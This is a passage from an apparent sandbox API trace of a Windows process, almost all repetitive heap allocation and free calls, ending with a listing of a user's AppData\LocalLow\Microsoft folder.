Size=0x60) returned 0x2cb4728 [0200.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0200.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.329] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.330] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.332] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.346] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0200.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.355] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0200.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0200.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0200.355] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0200.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f930 [0200.355] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0200.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0200.356] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0200.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0200.356] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0200.356] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.356] PathFindFileNameW (pszPath="") returned="" [0200.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0200.356] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0200.357] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.357] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0200.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0200.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0200.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0200.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0200.358] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0200.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0200.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x2ca5e50 [0200.358] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 0 [0200.358] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0200.358] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0200.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0200.359] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0200.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0200.359] PathFindFileNameW 